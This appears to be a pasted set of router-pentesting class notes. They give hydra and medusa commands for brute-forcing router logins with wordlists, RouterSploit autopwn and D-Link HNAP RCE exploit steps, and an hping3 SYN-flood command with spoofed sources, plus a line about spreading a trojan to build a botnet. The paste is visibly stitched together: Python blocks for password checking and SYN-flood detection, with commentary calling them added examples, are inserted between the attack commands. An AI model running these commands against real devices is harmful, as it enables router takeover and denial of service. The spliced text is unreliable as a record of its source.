LuciferAviSonicX
Untitled
Nov 7th, 2017

Router Pentesting
-----------------
VAPT - Vulnerability Assessment And Penetration Testing
We also do the same for routers and networking smart devices: routers, switches, etc.
1. The router password should be strong, with a minimum of 16 characters.
2. The password should mix upper- and lower-case letters, digits and special characters (it is case sensitive).
3. The password should never be a single word like "LuciferMorningStar"; it should always be a phrase like "SplinterItIntoThousandsPiecesAndScatterItIntoTheWind".
4. Never use passwords like "LoveYouBaby", "IHateYou", "Password", "123456789a".
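The four password rules above can be enforced on the defending side before a router admin password is accepted. The following checker is an added example, not code from the notes: the 16-character minimum, the character-class rules and the "never use" list are taken from the notes, while the blocklist contents, the "phrase" heuristic (count word-like runs, require at least four) and the message strings are assumptions made here.

```python
import re
from typing import List

# Constructed blocklist: the "never use" examples from the notes plus a few
# common router defaults. A real deployment would load a large leaked-password
# corpus from disk instead of this short inline set.
COMMON_PASSWORDS = {
    "loveyoubaby", "ihateyou", "password", "123456789a",
    "admin", "1234", "12345678", "qwerty",
}

MIN_LENGTH = 16   # from the notes
MIN_WORDS = 4     # threshold chosen here: "LuciferMorningStar" (3 words) fails, the long phrase passes

# A "word" is a capitalised or lower-case run of letters, or an all-caps run.
WORD_RE = re.compile(r"[A-Z]?[a-z]+|[A-Z]{2,}(?![a-z])")


def check_router_password(password: str) -> List[str]:
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[a-z]", password):
        problems.append("no lower-case letter")
    if not re.search(r"[A-Z]", password):
        problems.append("no upper-case letter")
    if not re.search(r"[0-9]", password):
        problems.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("no special character")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("on the common-password blocklist")
    # Phrase heuristic: a passphrase shows up as several CamelCase or
    # separator-delimited words; a single word or name does not.
    if len(WORD_RE.findall(password)) < MIN_WORDS:
        problems.append(f"fewer than {MIN_WORDS} words, use a longer phrase")
    return problems


if __name__ == "__main__":
    for candidate in ("Password", "LuciferMorningStar", "Splinter-It-Into-1000-Pieces&Scatter"):
        print(candidate, "->", check_router_password(candidate) or "OK")
```

Run as a pre-commit hook for the device's config management, or wire the same function into the admin UI's password-change handler, so a weak credential is rejected at the point it would be set rather than discovered later by a dictionary attack.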

There are many scenarios which we need to consider while pentesting a router.

1. Dumbest People ---> Those who never change their default username and password, or never set a router password at all.
http://routerpasswords.com/
http://192-168-1-1ip.mobi/default-router-passwords-list/

2. Little Smart People --> In this scenario, people change their default password but keep the default username.

3. More Smart People ---> They change both the username and the password of the router.

---> Hydra ---> Demo
---> Medusa --> Task for you to do...

When the username is default but the password was changed by the user
---------------------------------------------------------------------
hydra -s 80 -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get

hydra --> a brute-forcing tool used to crack login services ----> ftp, ssh, telnet, http, etc.
-s ---> port number
80 ---> the HTTP port
-l ---> a single username
admin --> the default username
-P --> password dictionary
/usr/share/wordlists/rockyou.txt ---> the dictionary in which my password is stored
192.168.0.1 ---> default gateway ---> the IP address of the router
http-get ----> the service module, i.e. the protocol through which the credentials are transmitted



Where The More Smart People Changed The Username And Password
-------------------------------------------------------------

hydra -s 80 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.0.1 http-get


To resume an interrupted hydra session I can type "hydra -R".


Medusa ---> Medusa is intended to be a speedy, massively parallel, modular login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers the following items to be some of the key features of this application:

Supported modules:
cvs, ftp, http, imap, mssql, mysql, nntp, pcanywhere, pop3, postgres, rdp, rexec, rlogin, rsh, smbnt, smtp, smtp-vrfy, snmp, ssh, svn, telnet, vmauthd, vnc, web-form, wrapper


medusa -h 192.168.0.1 -U /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt -e ns -t 1 -v 5 -f -M http
4. Where people are smartest, they hide the background information of the router's login page.... You will only get a prompt where it says:
Username :________
Password :________

Routersploit-Framework
----------------------
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:

exploits - modules that take advantage of identified vulnerabilities
creds - modules designed to test credentials against network services
scanners - modules that check if a target is vulnerable to any exploit

Download It From
https://github.com/reverse-shell/routersploit


Open the terminal, type
# git clone https://github.com/reverse-shell/routersploit.git
# cd routersploit
# pip install -r requirements.txt
# ./rsf.py

(RouterSploit ASCII-art banner: "IoT Exploitation Framework")

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Bad Blood
Version : 2.2.1

Exploits: 123 Scanners: 32 Creds: 13 Payloads: 10

rsf >
rsf > use scanners/autopwn
rsf (AutoPwn) > show options
rsf (AutoPwn) > set target 192.168.0.1
rsf (AutoPwn) > show options

Target options:

   Name      Current settings    Description
   ----      ----------------    -----------
   target    192.168.0.1         Target IP address e.g. 192.168.1.1
   port      80                  Target port


Module options:

   Name      Current settings    Description
   ----      ----------------    -----------
   threads   8                   Number of threads

rsf (AutoPwn) > run


rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
rsf (D-Link Multi HNAP RCE) >
rsf (D-Link Multi HNAP RCE) > show options

Target options:

   Name      Current settings    Description
   ----      ----------------    -----------
   target                        Target address e.g. http://192.168.1.1
   port      80                  Target Port


rsf (D-Link Multi HNAP RCE) > set target http://192.168.0.1
[+] {'target': 'http://192.168.0.1'}
rsf (D-Link Multi HNAP RCE) > show options
rsf (D-Link Multi HNAP RCE) > run



BOTNETS
-------
roBOT + NETwork = BOTNET
I will spread my trojan and the malicious malware, so that I can control the infected person's machine from my laptop.

DoS --> Denial Of Service
When a user sends a huge amount of data packets to the target and slows the system down.

hping3
------
hping3 is a network tool able to send custom TCP/IP packets and to display target replies like the ping program does with ICMP replies.
hping3 handles fragmentation, arbitrary packet body and size, and can be used in order to transfer files encapsulated under supported
protocols. Using hping3 you are able to perform at least the following stuff:

- Test firewall rules
- Advanced port scanning
- Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
- Path MTU discovery
- Transferring files between even really fascist firewall rules.
- Traceroute-like under different protocols.
- Firewalk-like usage.
- Remote OS fingerprinting.
- TCP/IP stack auditing.
- A lot of others.

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.16.79.141
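From the target's point of view the command above produces one recognisable pattern: a very high rate of bare SYNs to one port, each from a different (randomised) source, almost none of which ever completes a handshake. The detector below is an added example, not code from the notes or from hping3: it buckets SYN-only packets per destination port and second, then checks the SYN rate, the fraction of distinct sources and how many of those sources later ACK. The packet summary is constructed in code (the target address is the one from the command; the sources, timing, flag encoding and the thresholds of 100 SYN/s, 80% distinct sources and 10% completion are assumptions).

```python
from collections import defaultdict
from typing import Dict, List, Tuple

TARGET = "172.16.79.141"   # the address from the hping3 command above

# One record per client-to-server TCP packet: (timestamp, src, dst, dport, flags).
# Flags use tcpdump-style letters: "S" = SYN only, "A" = ACK, "PA" = PSH+ACK.
Packet = Tuple[float, str, str, int, str]


def constructed_packets() -> List[Packet]:
    """Constructed packet summary, not a real capture.

    200 SYNs inside one second, each from a different pseudo-random source,
    imitate a randomised-source SYN flood; one legitimate client at
    192.168.0.23 completes a normal handshake and sends a request.
    """
    packets: List[Packet] = []
    for i in range(200):
        # 7 is coprime to 256, so the second octet alone makes all 200 sources distinct.
        src = f"10.{(7 * i) % 256}.{(13 * i) % 256}.{(31 * i) % 256}"
        packets.append((1000.0 + i / 200.0, src, TARGET, 80, "S"))
    packets += [
        (1000.20, "192.168.0.23", TARGET, 80, "S"),
        (1000.21, "192.168.0.23", TARGET, 80, "A"),    # third step of the handshake
        (1000.25, "192.168.0.23", TARGET, 80, "PA"),   # request data
    ]
    return packets


def detect_syn_flood(packets: List[Packet], syn_per_sec: int = 100,
                     min_distinct_ratio: float = 0.8,
                     max_completion: float = 0.1) -> List[Dict]:
    """Alert on (dst, dport, second) buckets that look like a randomised SYN flood.

    A bucket is flagged when it holds at least syn_per_sec SYN-only packets,
    at least min_distinct_ratio of them come from different sources, and at
    most max_completion of those sources ever ACK the same destination port,
    i.e. the connections stay half-open.
    """
    syn_sources = defaultdict(list)   # (dst, dport, second) -> [src, ...]
    ack_sources = defaultdict(set)    # (dst, dport) -> {src, ...} that sent an ACK
    for ts, src, dst, dport, flags in packets:
        if flags == "S":
            syn_sources[(dst, dport, int(ts))].append(src)
        elif "A" in flags:
            ack_sources[(dst, dport)].add(src)

    alerts = []
    for (dst, dport, second), sources in syn_sources.items():
        n = len(sources)
        if n < syn_per_sec:
            continue
        distinct = set(sources)
        completed = len(distinct & ack_sources.get((dst, dport), set()))
        if len(distinct) / n >= min_distinct_ratio and completed / n <= max_completion:
            alerts.append({
                "dst": dst, "dport": dport, "second": second,
                "syns": n, "distinct_sources": len(distinct),
                "handshakes_completed": completed,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_syn_flood(constructed_packets()):
        print("SYN flood suspected:", alert)
```

The distinct-source ratio is what separates this from a single misbehaving client, and the completion ratio is what separates it from a legitimate traffic spike. Since the sources are forged, blocking them is pointless; the practical mitigations are SYN cookies on the exposed host and rate limits upstream of it.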